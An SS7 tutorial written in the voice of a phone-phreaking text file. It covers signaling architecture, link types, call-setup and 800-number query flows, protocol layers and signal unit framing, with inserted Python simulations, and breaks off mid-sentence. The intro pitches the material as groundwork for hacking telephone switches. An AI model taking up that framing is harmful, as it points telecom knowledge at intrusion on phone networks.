country you live in, Switching System 7 has been, or _will_ be implemented.
I have written a load of files on the various protocols of SS7, and its
many applications. I have written this file as a guide to the SS7 system, and
its network layout. This is _new_ information, not old 5ESS stuff. People
are still going on about 5ESS and how they can hack ESS switches. Bull Shit,
SS7 is the new system, it's time that phreaks started to look into this
massive new network instead of lingering in the past. Before my time, phreaks
could _phreak_ using just a phone, now if you want to take a CO, or switch,
you have to hack it. Since the advent of CCS (Common Channel Signaling), you
cannot interact with the phone network because the signaling and voice data
are handled on separate networks. If phreaking is going anywhere, it is
heading towards SS7 and AIN Frame Relay. I have obtained some information on
the SS7 system from Bellcore and other major telco players. After reading
the information (from books), I have decided to type it all up into a file for
everyone to read. The information I have on SS7 is all in paper format, so I
have merely copied it all into digital format, the way in which it should be.
SS7 is a relatively complicated protocol to grasp, but if no one bothers with
it _real_ phreaking will die. I hope everyone enjoys reading this file as
much as I enjoyed typing it up, all the information in this file has been
taken from technical books and journals, apart from the ASCII diagrams which
I have made to make the info easier to understand.

Index: Signaling System 7 (SS7)

1. What is Signaling?
2. What is Out-of-Band Signaling?
3. Signaling Network Architecture.
4. The North American Signaling Architecture
5. Basic Signaling Architecture
6. SS7 Link Types
7. Basic Call Setup Example
8. Database Query Example
9. Layers of the SS7 Protocol
10. What Goes Over the Signaling Link
11. Addressing in the SS7 Network
12. Signal Unit Structure
13. What are the Functions of the Different Signaling Units?
14. Message Signal Unit Structure
15. Acronym List


1. What is Signaling?

Signaling refers to the exchange of information between call components
required to provide and maintain service.

As users of the public switched telephone network, we exchange signaling with
network elements all the time. Examples of signaling between a telephone user
and the telephone network include: dialing digits, providing dial tone,
accessing a voice mailbox, sending a call-waiting tone, dialing *66 (to retry
a busy number), etc.

Signaling System 7 is a means by which elements of the telephone network
exchange information. Information is conveyed in the form of messages.
Signaling System 7 messages can convey information such as:

I am forwarding to you a call placed from 212-555-1234 to 718-555-5678. Look
for it on trunk 067.

Someone just dialed 800-555-1212. Where do I route the call?

The called subscriber for the call on trunk 11 is busy. Release the call and
play a busy tone.

The route to XXX is congested. Please don't send any messages to XXX unless
they are of priority 2 or higher.

I am taking trunk 143 out of service for maintenance.

SS7 is characterized by high-speed packet data, and out-of-band signaling.


2. What is Out-of-Band Signaling?

Out-of-band signaling is signaling that does not take place over the same
path as the conversation.

We are used to thinking of signaling as being in-band. We hear dial tone,
dial digits, and hear ringing over the same channel on the same pair of
wires. When the call completes, we talk over the same path that was used for
the signaling. Traditional telephony used to work in this way as well. The
signals to set up a call between one switch and another always took place
over the same trunk that would eventually carry the call. Signaling took the
form of a series of multifrequency (MF) tones, much like touch tone dialing
between switches.

Out-of-band signaling establishes a separate digital channel for the exchange
of signaling information. This channel is called a signaling link. Signaling
links are used to carry all the necessary signaling messages between nodes.
Thus, when a call is placed, the dialed digits, trunk selected, and other
pertinent information are sent between switches using their signaling links,
rather than the trunks which will ultimately carry the conversation. Today,
signaling links carry information at a rate of 56 or 64 kilobits per second
(kbps).

It is interesting to note that while SS7 is only used for signaling between
network elements, the ISDN D channel extends the concept of out-of-band
signaling to the interface between the subscriber and the switch. With ISDN
service, signaling that must be conveyed between the user station and the
local switch is carried on a separate digital channel called the D channel.
The voice or data which comprise the call is carried on one or more B
channels.

Why Out-of-Band Signaling?

Out-of-band signaling has several advantages that make it more desirable than
traditional in-band signaling:

It allows for the transport of more data at higher speeds (56 kbps can carry
data much faster than MF outpulsing). It allows for signaling at any time in
the entire duration of the call, not only at the beginning. It enables
signaling to network elements to which there is no direct trunk connection.


3. Signaling Network Architecture

If signaling is to be carried on a different path than the voice and data
traffic it supports, then what should that path look like?

The simplest design would be to allocate one of the paths between each
interconnected pair of switches as the signaling link. Subject to capacity
constraints, all signaling traffic between the two switches could traverse
this link. This type of signaling is known as associated signaling, and is
shown below in Figure 1.

Figure 1: Associated Signaling

Associated signaling works well as long as a switch's only signaling
requirements are between itself and other switches to which it has trunks. If
call setup and management were the only application of SS7, associated
signaling would meet that need simply and efficiently. In fact, much of the
out-of-band signaling deployed in Europe today uses associated mode.

The North American implementers of Signaling System 7, however, wanted to
design a signaling network that would enable any node to exchange signaling
with any other SS7-capable node. Clearly, associated signaling becomes much
more complicated when it is used to exchange signaling between nodes which do
not have a direct connection. From this need, the North American Signaling
System 7 architecture was born.


4. The North American Signaling Architecture

The North American signaling architecture defines a completely new and
separate signaling network. The network is built out of three essential
components, interconnected by signaling links. These components are signal
switching points (SSPs), signal transfer points (STPs), and signal control
points (SCPs). They are outlined in Table 1 below.

Table 1: North American Signaling Architecture Components


Component Function

Signal switching
points (SSPs)
SSPs are telephone switches (end offices or tandems)
equipped with SS7-capable software and terminating
signaling links. They generally originate, terminate,
or switch calls.
Signal transfer
points (STPs)
STPs are the packet switches of the SS7 network. They
receive and route incoming signaling messages towards
the proper destination. They also perform specialized
routing functions.
Signal control
points (SCPs)
SCPs are databases that provide information necessary
for advanced call-processing capabilities.


Once deployed, the availability of the SS7 network is critical to call
processing. Unless SSPs can exchange signaling, they cannot complete any
interswitch calls. For this reason, the SS7 network is built using a highly
redundant architecture. Each individual element must also meet exacting
requirements for availability. Finally, protocols have been defined between
interconnected elements to route signaling traffic around any failures that
arise in the signaling network.

To enable signaling network architectures to be easily communicated and
understood, a standard set of symbols was adopted for depicting SS7 networks.
Figure 2 shows the symbols that are used to depict these three key elements
of any SS7 network.

STPs and SCPs are customarily deployed in pairs. While elements of a pair are
not generally co-located, they work redundantly to perform the same logical
function. When drawing complex network diagrams, these pairs may be depicted
as a single element for simplicity, as shown in Figure 3.

Figure 3: STP and SCP Pairs


5. Basic Signaling Architecture

Figure 4 shows a small example of how the basic elements of an SS7 network
are deployed to form two interconnected networks.

Figure 4: Sample Network

Several points should be noted:


1.STPs W and X perform identical functions. They are redundant. Together,
they are referred to as a mated pair of STPs. Similarly, STPs Y and Z form
a mated pair.

2.Each SSP has two links (or sets of links), one to each STP of a mated pair.
All SS7 signaling to the rest of the world is sent out over these links.
Because the STPs of a mated pair are redundant, messages sent over either
link (to either STP) will be treated equivalently.

3.The STPs of a mated pair are joined by a link (or set of links).

4.Two mated pairs of STPs are interconnected by four links (or sets of links).
  These links are referred to as a quad.

5.SCPs are usually (though not always) deployed in pairs. As with STPs, the
SCPs of a pair are intended to function identically. Pairs of SCPs are also
referred to as mated pairs of SCPs. Note that they are not directly joined
by a pair of links.

Signaling architectures such as this, which provide indirect signaling paths
between network elements, are referred to as providing quasi-associated
signaling.


6. SS7 Link Types

SS7 signaling links are characterized according to their use in the signaling
network. Virtually all links are identical in that they are 56-kbps or 64-
kbps bi-directional data links that support the same lower layers of the
protocol; what is different is their use within a signaling network. The
defined link types are shown in Figure 5 below and defined as follows:

Figure 5: Link Types

A Links

A links are links that interconnect an STP and either an SSP or an SCP, which
are collectively referred to as signaling end points ("A" is intended to
stand for access). A links are used for the sole purpose of delivering
signaling to or from the signaling end points (they could just as well be
referred to as signaling beginning points). Examples of A links are 2-8, 3-7,
and 5-12 in Figure 5.

Signaling that an SSP or SCP wishes to send to any other node is sent on
either of its A links to its "home" STP, which, in turn, processes or routes
the messages. Similarly, messages intended for an SSP or SCP will be routed
to one of its "home" STPs, which will forward them to the addressed node over
its A links.

C Links

C links are links that interconnect mated STPs. As will be seen later, they
are used to enhance the reliability of the signaling network in instances
where one or several links are unavailable. "C" stands for cross. (7-8, 9-10
and 11-12 are C links.)

B Links, D Links, and B/D Links

Links interconnecting two mated pairs of STPs are referred to as either B
links, D links, or B/D links. Regardless of their name, their function is to
carry signaling messages beyond their initial point of entry to the signaling
network towards their intended destination. The "B" stands for bridge and is
intended to describe the quad of links interconnecting peer pairs of STPs.
The "D" denotes diagonal and is intended to describe the quad of links
interconnecting mated pairs of STPs at different hierarchical levels. Because
there is no clear hierarchy associated with a connection between networks,
interconnecting links are referred to as either B, D, or B/D links. (7-11 and
7-12 are examples of B links; 8-9 and 7-10 are examples of D links; 10-13 and
9-14 are examples of interconnecting links and can be referred to as B, D, or
B/D links.)

E Links

While an SSP is connected to its "home" STP pair by a set of "A" links,
enhanced reliability can be provided by deploying an additional set of links
to a second STP pair. These links, called "E" (extended) links provide backup
connectivity to the SS7 network in the event that the "home" STPs cannot be
reached via the "A" links. While all SS7 networks include "A," "B/D," and "C"
links, "E" links may or may not be deployed at the discretion of the network
provider. The decision of whether or not to deploy "E" links can be made by
comparing the cost of deployment with the improvement in reliability. (1-11
and 1-12 are E links.)

F Links

"F" (for fully associated) links are links which directly connect two
signaling end points. F links allow associated signaling only. Because they
_bypass_ the security features provided by an STP, F links are not generally
deployed between networks. Their use within an individual network is at the
discretion of the network provider. (1-2 is an F link.)


7. Basic Call Setup Example

Before going into much more detail, it might be helpful to look at several
basic calls and the way in which they use SS7 signaling (see Figure 6).

Figure 6: Call Setup Example

In this example, a subscriber on switch A places a call to a subscriber on
switch B:

1.Switch A analyzes the dialed digits and determines that it needs to send
the call to switch B.

2.Switch A selects an idle trunk between itself and switch B and formulates
an initial address message (IAM), the basic message necessary to initiate a
call. The IAM is addressed to switch B. It identifies the initiating switch
(switch A), the destination switch (switch B), the trunk selected, the
calling and called numbers, as well as other information beyond the scope
of this example.

3.Switch A picks one of its A links (say AW) and transmits the message over
the link for routing to switch B.

4.STP W receives the message, inspects its routing label, and determines that
  it is to be routed to switch B. It transmits the message on link BW.

5.Switch B receives the message. On analyzing the message, it determines that
it serves the called number and that the called number is idle.

6.Switch B formulates an address complete message (ACM), which indicates that
the IAM has reached its proper destination. The message identifies the
recipient switch (A), the sending switch (B), and the selected trunk.

7.Switch B picks one of its A links (say BX) and transmits the ACM over the
link for routing to switch A. At the same time, it completes the call path
in the backwards direction (towards switch A), sends a ringing tone over
that trunk towards switch A, and rings the line of the called subscriber.

8.STP X receives the message, inspects its routing label, and determines that
it is to be routed to switch A. It transmits the message on link AX.

9.On receiving the ACM, switch A connects the calling subscriber line to the
selected trunk in the backwards direction (so that the caller can hear the
ringing sent by switch B).

10.When and/or if the called subscriber picks up the phone, switch B
formulates an answer message (ANM), identifying the intended recipient
switch (A), the sending switch (B), and the selected trunk.

11.Switch B selects the same A link it used to transmit the ACM (link BX) and
sends the ANM. By this time, the trunk must also be connected to the
called line in both directions (to allow conversation).

12.STP X recognizes that the ANM is addressed to switch A and forwards it
over link AX.

13.Switch A ensures that the calling subscriber is connected to the outgoing
trunk (in both directions) and that conversation can take place.

14.If the calling subscriber hangs up first (following the conversation),
switch A will generate a release message (REL) addressed to switch B,
identifying the trunk associated with the call. It sends the message on
link AW.

15.STP W receives the REL, determines that it is addressed to switch B, and
  forwards it using link BW.

16.Switch B receives the REL, disconnects the trunk from the subscriber line,
returns the trunk to idle status, generates a release complete message
(RLC) addressed back to switch A, and transmits it on link BX. The RLC
identifies the trunk used to carry the call.

17.STP X receives the RLC, determines that it is addressed to switch A, and
forwards it over link AX.

18.On receiving the RLC, switch A idles the identified trunk.
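
The walk-through above can be exercised end to end. The following is an added
example, not code from the article or from any switch vendor: two SSPs (point
codes "A" and "B") exchange IAM/ACM/ANM/REL/RLC through a mated STP pair (W
and X). The STPs look only at the DPC of the routing label, the SLS value
picks which A link a message leaves on, and every message carries the trunk it
refers to. Point codes, subscriber numbers, trunk ids and the busy/idle line
states are constructed for the example; the release on a busy called line is
ISUP behaviour the article's happy-path walk-through does not show.

```python
"""ISUP basic call over a quasi-associated SS7 network (added example)."""


class Msg:
    """An MSU as the user part sees it: routing label (OPC/DPC) plus trunk id."""
    def __init__(self, kind, opc, dpc, trunk, **info):
        self.kind, self.opc, self.dpc, self.trunk, self.info = kind, opc, dpc, trunk, info


class STP:
    """Routes on the DPC of the routing label only; never looks inside ISUP."""
    def __init__(self, name, routes):
        self.name, self.routes, self.log = name, routes, []

    def route(self, msg):
        self.log.append("%s:%s->%s" % (self.name, msg.kind, msg.dpc))
        self.routes[msg.dpc].receive(msg)


class Switch:
    def __init__(self, pc, lines, trunks):
        self.pc, self.lines = pc, dict(lines)          # line number -> "idle"/"busy"
        self.peer = dict(trunks)                        # trunk id -> far-end point code
        self.trunks = {t: "idle" for t in trunks}
        self.trunk_line = {}                            # trunk id -> local line using it
        self.stps, self.events = [], []

    def send(self, msg, sls):
        # The SLS value selects one of the A links to the mated STP pair.
        self.stps[sls % len(self.stps)].route(msg)

    def place_call(self, caller, called, dest_pc, sls=0):
        trunk = next(t for t, s in self.trunks.items()
                     if s == "idle" and self.peer[t] == dest_pc)
        self.trunks[trunk], self.lines[caller] = "seized", "busy"
        self.trunk_line[trunk] = caller
        self.send(Msg("IAM", self.pc, dest_pc, trunk, calling=caller, called=called), sls)
        return trunk

    def hang_up(self, trunk, sls=0):
        self.send(Msg("REL", self.pc, self.peer[trunk], trunk), sls)

    def _release_trunk(self, trunk):
        self.trunks[trunk] = "idle"
        line = self.trunk_line.pop(trunk, None)
        if line:
            self.lines[line] = "idle"

    def receive(self, msg):
        self.events.append(msg.kind)
        reply = lambda kind: self.send(Msg(kind, self.pc, msg.opc, msg.trunk), msg.trunk)
        if msg.kind == "IAM":
            called = msg.info["called"]
            if self.lines.get(called) != "idle":
                reply("REL")               # busy or unknown line: release the trunk
                return
            self.trunks[msg.trunk], self.trunk_line[msg.trunk] = "ringing", called
            reply("ACM")                   # backward path up: caller hears ringing
            self.lines[called] = "busy"    # called party answers
            self.trunks[msg.trunk] = "connected"
            reply("ANM")
        elif msg.kind == "ACM":
            self.trunks[msg.trunk] = "ringing"
        elif msg.kind == "ANM":
            self.trunks[msg.trunk] = "connected"
        elif msg.kind == "REL":
            self._release_trunk(msg.trunk)
            reply("RLC")
        elif msg.kind == "RLC":
            self._release_trunk(msg.trunk)


def build_network():
    """Constructed topology: SSPs A and B, mated STPs W and X, two trunks."""
    a = Switch("A", {"5551000": "idle"}, {1: "B", 2: "B"})
    b = Switch("B", {"5552000": "idle", "5552001": "busy"}, {1: "A", 2: "A"})
    w, x = STP("W", {"A": a, "B": b}), STP("X", {"A": a, "B": b})
    a.stps = b.stps = [w, x]              # A links AW/AX and BW/BX
    return a, b, w, x


def run_call(called):
    """Call from A's subscriber to `called` on B; hang up if it was answered.
    Returns the messages seen at A and B, final trunk/line states, STP logs."""
    a, b, w, x = build_network()
    trunk = a.place_call("5551000", called, "B")
    if a.trunks[trunk] == "connected":
        a.hang_up(trunk)
    return {"a": a.events, "b": b.events, "trunk": (a.trunks[trunk], b.trunks[trunk]),
            "lines": (a.lines["5551000"], b.lines[called]), "w": w.log, "x": x.log}
```

Running run_call("5552000") reproduces the article's sequence: A sees ACM,
ANM and RLC, B sees IAM and REL, W carries A's messages (IAM, REL) and X
carries B's replies, and both ends return the trunk to idle. With the busy
line "5552001" B answers the IAM with REL and the trunk is idled without ever
being connected.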


8. Database Query Example

People generally are familiar with the toll-free aspect of 800 (or 888)
numbers, but these numbers have significant additional capabilities made
possible by the SS7 network. 800 numbers are "virtual" telephone numbers.
Although they are used to point to "real" telephone numbers, they are not
assigned to the subscriber line itself.

When a subscriber dials an 800 number, it is a signal to the switch to
suspend the call and seek further instructions from a database. The database
will provide either a real phone number to which the call should be directed,
or it will identify another network (e.g., a long-distance carrier) to which
the call should be routed for further processing. While the response from the
database could be the same for every call (as, for example, if you have a
personal 800 number), it can be made to vary based on the calling number, the
time of day, the day of the week, or a number of other factors.

The following example shows how an 800 call is routed (see Figure 7).

Figure 7: Database Query Example


1.A subscriber served by switch A wants to reserve a rental car at a
company's nearest location. She dials the company's advertised 800 number.

2.When the subscriber has finished dialing, switch A recognizes that this is
an 800 call and that it requires assistance to handle it properly.

3.Switch A formulates an 800 query message including the calling and called
number and forwards it to either of its STPs (e.g., X) over its A link to
that STP (AX).

4.STP X determines that the received query is an 800 query and selects a
database suitable to respond to the query (e.g., M).

5.STP X forwards the query to SCP M over the appropriate A link (MX).

6.SCP M receives the query, extracts the passed information, and (based on
its stored records) selects either a "real" telephone number or a network
(or both) to which the call should be routed.

7.SCP M formulates a response message with the information necessary to
properly process the call, addresses it to switch A, picks an STP and an A
link to use (e.g., MW), and routes the response.

8.STP W receives the response message, recognizes that it is addressed to
switch A, and routes it to A over AW.

9.Switch A receives the response and uses the information to determine where
the call should be routed. It then picks a trunk to that destination,
generates an initial address message (IAM), and proceeds (as it did in the
previous example) to set up the call.


9. Layers of the SS7 Protocol

As the call-flow examples show, the SS7 network is an interconnected set of
network elements that is used to exchange messages in support of
telecommunications functions. The SS7 protocol is designed to both facilitate
these functions and to maintain the network over which they are provided.
Like most modern protocols, the SS7 protocol is layered.

The underlying layers of the SS7 protocol are as follows:

Physical Layer

This defines the physical and electrical characteristics of the signaling
links of the SS7 network. Signaling links utilize DS0 channels and carry raw
signaling data at a rate of 56 kbps or 64 kbps (56 kbps is the more common
implementation).

Message Transfer Part - Level 2

The level 2 portion of the message transfer part (MTP Level 2) provides
link-layer functionality. It ensures that the two end points of a signaling
link can reliably exchange signaling messages. It incorporates such
capabilities as error checking, flow control, and sequence checking.

Message Transfer Part - Level 3

The level 3 portion of the message transfer part (MTP Level 3) extends the
functionality provided by MTP level 2 to provide network layer functionality.
It ensures that messages can be delivered between signaling points across the
SS7 network regardless of whether they are directly connected. It includes
such capabilities as node addressing, routing, alternate routing, and
congestion control.

Collectively, MTP levels 2 and 3 are referred to as the message transfer part
(MTP).

Signaling Connection Control Part

The signaling connection control part (SCCP) provides two major functions
that are lacking in the MTP. The first of these is the capability to address
applications within a signaling point. The MTP can only receive and deliver
messages from a node "as a whole"; it does not deal with software
applications within a node.

While MTP network management messages and basic call-setup messages are
addressed to a node as a whole, other messages are used by separate
applications (referred to as subsystems) within a node. Examples of
subsystems are 800 call processing, calling-card processing, advanced
intelligent network, and CLASS services (e.g., Repeat Dialing and Call
Return). The SCCP allows these subsystems to be addressed explicitly.

Global Title Translation

The second function provided by the SCCP is the ability to perform
incremental routing using a capability called global title translation.
Global title translation frees originating signaling points from the burden
of having to know every potential destination to which they might have to
route a message. A switch can originate a query, for example, and address it
to an STP along with a request for global title translation. The receiving
STP can then examine a portion of the message, make a determination as to
where the message should be routed, and then route it.

For example, calling-card queries (used to verify that a call can be properly
billed to a calling card) must be routed to an SCP designated by the company
that issued the calling card. Rather than maintaining a nationwide database
of where such queries should be routed (based on the calling-card number),
switches generate queries addressed to their local STPs, which, using global
title translation, select the correct destination to which the message should
be routed. Note that there is no magic here; STPs must maintain a database
that enables them to determine to where a query should be routed. Global
title translation effectively centralizes the problem and places it in a node
(the STP) that has been designed to perform this function.

In performing global title translation, an STP does not need to know the
exact final destination of a message. It can, instead, perform "intermediate
global title translation," in which it uses its tables to find another STP
further along the route to the destination. That STP, in turn, can perform
"final global title translation," routing the message to its actual
destination.

Intermediate global title translation minimizes the need for STPs to maintain
extensive information about nodes which are far removed from them. Global
Title Translation is also used at the STP to share load among mated SCPs in
both normal and failure scenarios. In these instances, when messages arrive
at an STP for final global title translation and routing to a database, the
STP can select from among available redundant SCPs. It can select an SCP on
either a priority basis (referred to as primary -- backup) or so as to
equalize the load across all available SCPs (referred to as load sharing).
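
The 800 query of section 8 and the global title translation described above
can be put together in one piece of code. This is an added example, not the
article's or any vendor's code: an STP translation table keyed on translation
type and called-party digit prefix (longest prefix wins) yields either a final
destination among mated SCPs, chosen primary-backup or load-shared, or another
STP for intermediate translation; a constructed 800 database then returns a
routing number that depends on the calling number and the hour. The table
entries, point codes, 800 records and SCP availability states are all
invented for the example.

```python
"""SCCP global title translation at an STP plus an 800 query (added example)."""

# (translation type, digit prefix) -> (mode, candidate nodes); longest prefix wins.
GTT_TABLE = {
    ("800", "800"): ("load-share", ["M", "N"]),        # mated SCP pair, either answers
    ("800", "888"): ("load-share", ["M", "N"]),
    ("card", "891"): ("primary-backup", ["P", "Q"]),   # card issuer's SCPs, Q only if P is down
    ("card", "8915"): ("intermediate", ["STP-Y"]),     # another network: hand to its STP
}


def global_title_translate(tt, digits, available, sls=0):
    """Return (next node, 'final' or 'intermediate') for a called-party address."""
    for n in range(len(digits), 0, -1):
        entry = GTT_TABLE.get((tt, digits[:n]))
        if entry:
            break
    else:
        raise LookupError("no translation for %s/%s" % (tt, digits))
    mode, nodes = entry
    if mode == "intermediate":
        return nodes[0], "intermediate"       # final translation happens downstream
    up = [pc for pc in nodes if pc in available]
    if not up:
        raise RuntimeError("no SCP available for %s" % digits)
    chosen = up[0] if mode == "primary-backup" else up[sls % len(up)]
    return chosen, "final"


class SCP800:
    """800 database. Record: list of (calling NPA or '*', (from_hour, to_hour),
    routing number); the first matching rule wins."""
    def __init__(self, records):
        self.records = records

    def query(self, called, calling, hour):
        for npa, (start, end), number in self.records[called]:
            if (npa == "*" or calling.startswith(npa)) and start <= hour < end:
                return number
        raise LookupError("no routing rule for %s" % called)


RECORDS = {                                            # constructed sample data
    "8005550100": [("512", (8, 18), "5125550199"),     # 512 callers, business hours
                   ("*", (0, 24), "2125550100")],      # everyone else, or after hours
}
SCPS = {"M": SCP800(RECORDS), "N": SCP800(RECORDS)}   # mated pair, identical data


def handle_800_query(called, calling, hour, available=("M", "N"), sls=0):
    """What the STP does with a switch's 800 query: translate, forward, answer."""
    scp, stage = global_title_translate("800", called, set(available), sls)
    assert stage == "final"
    return scp, SCPS[scp].query(called, calling, hour)
```

With both SCPs up the load-shared queries alternate between M and N on the
SLS value; with M marked unavailable every query goes to N with the same
answer, which is the failure scenario the paragraph above describes. The
calling-card entries show primary-backup selection and an intermediate
translation to another network's STP.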

ISDN User Part (ISUP)

The ISDN user part defines the messages and protocol used in the
establishment and tear down of voice and data calls over the public switched
network, and to manage the trunk network on which they rely. Despite its
name, ISUP is used for both ISDN and non-ISDN calls. In the North American
version of SS7, ISUP messages rely exclusively on MTP to transport messages
between concerned nodes.

Transaction Capabilities Application Part (TCAP)

The transaction capabilities application part defines the messages and
protocol used to communicate between applications (deployed as subsystems) in
nodes. It is used for database services such as calling card, 800, and AIN as
well as switch-to-switch services including Repeat Dialing and Call Return.
Because TCAP messages must be delivered to individual applications within the
nodes they address, they use the SCCP for transport.

Operations, Maintenance and Administration Part (OMAP)

The operations, maintenance, and administration part defines messages and
protocol designed to assist administrators of the SS7 network. To date, the
most fully developed and deployed of these capabilities are procedures for
validating network routing tables and for diagnosing link troubles. OMAP
includes messages that use both the MTP and SCCP for routing.


10. What Goes Over the Signaling Link

Signaling information is passed over the signaling link in messages, which
are called signal units (SUs). Three types of signal units are defined in the
SS7 protocol:

Message signal units (MSUs)

Link status signal units (LSSUs)

Fill-in signal units (FISUs)

Signal units are transmitted continuously in both directions on any link that
is in service. A signaling point that does not have MSUs or LSSUs to send
will send FISUs over the link. The FISUs perform the function suggested by
their name; they "fill up" the signaling link until there is a need to send
purposeful signaling. They also facilitate link transmission monitoring and
the acknowledgment of other SUs.

All transmission on the signaling link is broken up into 8-bit bytes,
referred to as octets. Signal units on a link are delimited by a unique 8-bit
pattern known as a flag. The flag is defined as the 8-bit pattern "01111110".
Because data within a signal unit could contain this pattern, the transmitter
applies zero-bit insertion: after every five consecutive 1 bits of the signal
unit it inserts a 0, so that six consecutive 1s can only ever appear in a
flag. The receiver reverses the process, deleting every 0 that follows five
consecutive 1s, once the signal unit has been taken off the link. Thus, any
occurrence of the flag on the link indicates the end of one signal unit and
the beginning of another. While in theory two flags could be placed between
SUs (one to mark the end of the current message and one to mark the start of
the next message), in practice a single flag is used for both purposes.


11. Addressing in the SS7 Network

Every network must have an addressing scheme, and the SS7 network is no
different. Network addresses are required so that a node can exchange
signaling with nodes to which it has no physical signaling link. In SS7,
addresses are assigned using a three-level hierarchy. Individual signaling
points are identified as belonging to a "cluster" of signaling points. Within
that cluster, each signaling point is assigned a "member" number. Similarly,
a cluster is defined as being part of a "network." Any node in the American
SS7 network can be addressed by a three-level number defined by its network,
cluster, and member numbers. Each of these numbers is an 8-bit number and can
assume values from 0 to 255. This three-level address is known as the "point
code" of the signaling point.

Network numbers are assigned on a nationwide basis by a neutral party.
Regional Bell operating companies (RBOCs), major Independent telephone
companies and interexchange carriers already have network numbers assigned.
Since network numbers are a relatively scarce resource, companies' networks
are expected to meet certain size requirements in order to be assigned a
network number. Smaller networks can be assigned one or more cluster numbers
within network numbers 1, 2, 3, and 4. The smallest networks are assigned
"point codes" within "network number" 5. The cluster to which they are
assigned is determined by the state in which they are located. The network
number 0 is not available for assignment and network number 255 is reserved
for future use.

In short, "point code" is the term used to describe the three-level address
number created by combining the network, cluster, and member numbers. A point
code uniquely identifies a signaling point within the American SS7 network
and is used whenever it is necessary to address that signaling point.


12. Signal Unit Structure

Signal units of each type follow a format unique to that type. A high-level
view of those formats is shown in Figure 8.

Figure 8: Signaling Unit Formats

All three SU types have a set of common fields that are used by MTP Level 2.
They are as follows:

Flag

Flags delimit SUs. A flag marks the end of one SU and the start of the next.

Checksum

The checksum (the check bits, CK) is a 16-bit cyclic redundancy check
intended to verify that the SU has passed across the link error-free. The
check bits are calculated over the signal unit by the transmitting signaling
point and appended to it. On receipt, they are recalculated by the receiving
signaling point. If the calculated result differs from the received check
bits, the received SU has been corrupted; it is discarded and a
retransmission is requested.

Length Indicator

The length indicator indicates the number of octets between itself and the
checksum. It serves both as a check on the integrity of the SU and as a means
of discriminating between different types of SUs at level 2. As can be
inferred from Figure 8, FISUs have a length indicator of 0; LSSUs have a
length indicator of 1 or 2 (currently all LSSUs have a length indicator of 1)
and MSUs have a length-indicator greater than 2. According to the protocol,
only 6 of the 8 bits in the length indicator field are actually used to store
this length; thus the largest value that can be accommodated in the length
indicator is 63. For MSUs with more than 63 octets following the length
indicator, the value of 63 is used.

BSN/BIB FSN/FIB

These octets hold the backward sequence number (BSN), the backward
indicator bit (BIB), the forward sequence number (FSN), and the forward
indicator bit (FIB). These fields are used to confirm receipt of SUs and to
ensure that they are received in the order in which they were transmitted.
They are also used to provide flow control. Each MSU, when transmitted, is
assigned a sequence number that is placed in the forward sequence number
field of the outgoing SU. The MSU is stored by the transmitting signaling
point until it is acknowledged by the receiving signaling point. FISUs and
LSSUs are not acknowledged; they simply carry the FSN of the last MSU sent.

Since the 7 bits allocated to the forward sequence number can store 128
distinct values, and the number of the last acknowledged MSU must remain
distinguishable from those still outstanding, a signaling point is restricted
to 127 unacknowledged MSUs before it must await an acknowledgment. By
acknowledging an MSU, the receiving node frees that MSU's sequence number at
the transmitting node, making it available for a new outgoing MSU. Signaling
points acknowledge receipt of MSUs by placing the sequence number of the last
correctly received and in-sequence MSU in the backward sequence number of
every SU they transmit. In that way, they acknowledge all previously received
MSUs as well. The forward and backward indicator bits are used to indicate
sequencing or data-corruption errors and to request retransmission.

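Sections 10 and 12 describe the link-layer envelope; the following added
example (not code from the article) implements it: signal units are built
from BSN/BIB, FSN/FIB, a 6-bit length indicator that saturates at 63, the
payload and a 16-bit check field; they are put on the link least significant
bit first with zero-bit insertion and a single 01111110 flag between
neighbours; the receiver cuts the stream at flags, undoes the insertion,
verifies the check field and classifies each SU by its length indicator. One
assumption: the check field is computed as the HDLC frame check sequence
(CRC-16/X-25), which is taken here to be what Q.703 specifies. The sample
signal units are constructed, with a payload that deliberately contains 0x7E
and 0xFF so that the stuffing has something to do.

```python
"""MTP Level 2 signal unit framing (added example)."""

FLAG = [0, 1, 1, 1, 1, 1, 1, 0]          # 0x7E, least significant bit first


def crc16(data):
    """CRC-16/X-25 (HDLC FCS): reflected 0x1021, init 0xFFFF, final XOR 0xFFFF.
    Assumed here to match the Q.703 check bits."""
    crc = 0xFFFF
    for byte in data:
        crc ^= byte
        for _ in range(8):
            crc = (crc >> 1) ^ 0x8408 if crc & 1 else crc >> 1
    return crc ^ 0xFFFF


def encode_su(bsn, bib, fsn, fib, payload=b""):
    """BSN/BIB octet, FSN/FIB octet, LI (6 bits, saturates at 63), payload, CK."""
    li = min(len(payload), 63)
    body = bytes([(bib & 1) << 7 | (bsn & 0x7F),
                  (fib & 1) << 7 | (fsn & 0x7F), li]) + payload
    ck = crc16(body)
    return body + bytes([ck & 0xFF, ck >> 8])        # CK sent low octet first


def decode_su(su):
    """Verify CK, then classify by LI: 0 = FISU, 1 or 2 = LSSU, above 2 = MSU."""
    body, ck = su[:-2], su[-2] | (su[-1] << 8)
    if crc16(body) != ck:
        raise ValueError("check field mismatch: request retransmission")
    li, payload = body[2] & 0x3F, body[3:]
    if li != min(len(payload), 63):
        raise ValueError("length indicator does not match signal unit length")
    kind = "FISU" if li == 0 else "LSSU" if li <= 2 else "MSU"
    return {"type": kind, "bsn": body[0] & 0x7F, "bib": body[0] >> 7,
            "fsn": body[1] & 0x7F, "fib": body[1] >> 7, "li": li, "payload": payload}


def to_bits(data):
    return [(byte >> i) & 1 for byte in data for i in range(8)]


def to_octets(bits):
    if len(bits) % 8:
        raise ValueError("signal unit is not a whole number of octets")
    return bytes(sum(bits[i + j] << j for j in range(8)) for i in range(0, len(bits), 8))


def stuff(bits):
    """Zero-bit insertion: a 0 after every five consecutive 1s, so that the
    flag pattern can never occur inside a signal unit."""
    out, run = [], 0
    for bit in bits:
        out.append(bit)
        run = run + 1 if bit else 0
        if run == 5:
            out.append(0)
            run = 0
    return out


def unstuff(bits):
    """Drop the 0 that follows every five consecutive 1s."""
    out, run, skip = [], 0, False
    for bit in bits:
        if skip:
            skip = False
            continue
        out.append(bit)
        run = run + 1 if bit else 0
        if run == 5:
            skip, run = True, 0
    return out


def frame(sus):
    """Put signal units on the link with a single flag between neighbours."""
    bits = list(FLAG)
    for su in sus:
        bits += stuff(to_bits(su)) + FLAG
    return bits


def deframe(bits):
    """Cut the bit stream at every flag, undo zero insertion, decode each SU."""
    sus, current = [], []
    for bit in bits:
        current.append(bit)
        if current[-8:] == FLAG:
            if len(current) > 8:
                sus.append(decode_su(to_octets(unstuff(current[:-8]))))
            current = []
    return sus
```

An MSU with 74 payload octets comes back with a length indicator of 63, a
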